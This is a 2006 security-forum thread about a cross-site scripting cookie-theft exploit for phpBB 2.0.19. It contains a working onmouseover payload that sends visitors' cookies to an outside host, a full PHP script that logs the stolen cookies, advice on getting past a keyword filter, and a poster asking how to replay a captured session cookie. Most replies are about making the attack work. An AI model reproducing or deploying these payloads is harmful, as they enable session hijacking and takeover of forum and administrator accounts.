 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit |
 |
 Posted: Tue Jan 31, 2006 11:40 pm |
 |
|
| syntax9 |
| Active user |
 |
|
| Joined: Dec 21, 2005 |
| Posts: 33 |
|
|
|
 |
|
 |
|
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan
/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.
use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.
the following is a simple attack:
*/
<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >
http://www.somesite.com/</pre>
# milw0rm.com [2006-01-29] |
|
|
|
|
|
|
|
|
| Posted: Wed Feb 01, 2006 7:20 pm |
|
|
| cXIb8O3 |
| Active user |
 |
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Feb 11, 2006 6:08 am |
|
|
| subzero |
| Valuable expert |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Mar 08, 2006 10:09 am |
|
|
| Musaaf |
| Beginner |
 |
|
| Joined: Mar 08, 2006 |
| Posts: 3 |
|
|
|
|
|
|
|
Just reading this, the exploit for 2.0.19
http://www.kisobox.com/exploits/Remote/phpbb.2.0.19.xss+cookies.stealer.txt
| Quote: | POC : xss in bbcode (html enable)
<pre a='>' onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b='<pre' >
cookies.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?> |
How to use it ? and what to do with the cookie.php file |
|
|
|
|
|
hola |
|
| Posted: Tue Mar 14, 2006 7:13 pm |
|
|
| DARKNIGHT |
| Beginner |
|
|
| Joined: Mar 14, 2006 |
| Posts: 1 |
|
|
|
|
|
|
|
Well, Thank you for the code, it's nice, but I have a problem.
First, I proved that code in my localhost, my localhost has Nuke ET 3.3 (the nuke et is a version of php-nuke modified => www.truzone.org). HTML is on.
I wrote the code in a post:
<pre a='>' onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b='<pre' >Cualquier texto o codigo</pre>
But maybe the nuke changed the code for this:
onmouseover='doc***nt.location="http://localhost/cookies.php?c="+doc***nt.cookie' b='<pre' >Cualquier texto o codigo</pre>
So, in concret the possible protection is that when you write the word document the nuke et change it for doc***nt.
My question is this: can I use concatenation o something in order to change the word document?.
For example that one variable represent one letter and soon to unite them.
var1="doc " + "u" + "m" + "e" + "nt";
Maybe I'm crazy for saying a theory (aja) very ridiculous.
And finally another question do you have another solution or existing another code in orde to explode this bug?
Well, thank you for your answers and I'm sorry for my english, I don't have practice with my english. |
|
|
|
|
|
|
|
|
| Posted: Tue Mar 14, 2006 9:27 pm |
|
|
| syntax9 |
| Active user |
|
|
| Joined: Dec 21, 2005 |
| Posts: 33 |
|
|
|
|
|
|
|
| the code is for phpbb, never tried it with phpnuke. |
|
|
|
|
|
Re: hola |
|
| Posted: Tue Mar 14, 2006 10:22 pm |
|
|
| cXIb8O3 |
| Active user |
|
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
| DARKNIGHT wrote: |
My question is this: can I use concatenation o something in order to change the word document?.
|
Try HTML without semicolons... I am not sure.. but i have tested in IE and works..
document=document
etc.. |
|
|
|
|
|
Re: hola |
|
| Posted: Tue Mar 14, 2006 10:24 pm |
|
|
| cXIb8O3 |
| Active user |
|
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
| DARKNIGHT wrote: |
My question is this: can I use concatenation o something in order to change the word document?.
|
Try HTML without semicolons... I am not sure.. but i have tested in IE and works..
document=document
etc.. |
|
|
|
|
|
Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit |
|
| Posted: Wed Mar 15, 2006 6:14 pm |
|
|
| greatshape |
| Beginner |
|
|
| Joined: Mar 10, 2006 |
| Posts: 4 |
|
|
|
|
|
|
|
| syntax9 wrote: | # to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan
/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.
use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.
the following is a simple attack:
*/
<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >
http://www.somesite.com/</pre>
# milw0rm.com [2006-01-29] |
Just found something worth mentioning.
This isn't working on phpbb 2.0.19 if you send the admin a PM to steal his cookie.
Html is always disabled in his inbox, even when it's enabled on the board.
He will always see the rough html code you typed in his PM
Regards
GreATshaPe |
|
|
|
|
|
|
|
|
| Posted: Wed Mar 15, 2006 8:14 pm |
|
|
| cXIb8O3 |
| Active user |
|
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Mar 16, 2006 2:40 am |
|
|
| greatshape |
| Beginner |
|
|
| Joined: Mar 10, 2006 |
| Posts: 4 |
|
|
|
|
|
|
|
Looks nice! I don't get it for 100%, but i'll find out.
For example, in the movie, where does the root login come from all of a sudden?
How does the attacker know this login?
Tnx
PS Is there a way to defend against this as admin? |
|
|
|
|
|
|
|
|
| Posted: Thu Mar 16, 2006 1:49 pm |
|
|
| sami |
| Beginner |
|
|
| Joined: Mar 16, 2006 |
| Posts: 1 |
|
|
|
|
|
|
|
In regards to the following exploit....
i quote from somewhere else
| Quote: |
1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.
phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.
2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links. |
which seems to hold true, will need to get admin SID first..... |
|
|
|
|
|
|
|
|
| Posted: Thu Mar 16, 2006 1:49 pm |
|
|
| sami |
| Beginner |
|
|
| Joined: Mar 16, 2006 |
| Posts: 1 |
|
|
|
|
|
|
|
In regards to the following exploit....
i quote from somewhere else
| Quote: |
1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.
phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.
2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links. |
which seems to hold true, will need to get admin SID first..... |
|
|
|
|
|
|
|
|
| Posted: Thu Mar 16, 2006 2:59 pm |
|
|
| cXIb8O3 |
| Active user |
|
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
| sami wrote: |
i quote from somewhere else
| Quote: |
1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.
phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.
2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links. |
which seems to hold true, will need to get admin SID first..... |
in exploit you have
| Code: |
$url = parse_url(getenv('HTTP_REFERER'));
preg_match('/(\/.*)\//', $url['path'], $path);
preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid); |
if in HTTP_REFFERER is sid... exploit works... admin need see hacker profil with IMG URL to exploit.. |
|
|
|
|
|
|
|
|
| Posted: Sat Mar 18, 2006 6:16 am |
|
|
| Cat |
| Beginner |
|
|
| Joined: Mar 15, 2006 |
| Posts: 4 |
|
|
|
|
|
|
|
Hmmm..
Well this obviously works, results:
phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; phpbb2mysql_sid=5a37b34c08b31a776b01faaff43e6d38
However I have come to a dire problem. When it comes to crafting the cookie, it doesn't work right. I used FF to craft --
name: phpbb2mysql_data
data: a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}
etc...
Doesn't work though...I have tried converting the _data (example) one to hex as well.
Any suggestions? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 77
Members: 0
Total: 77
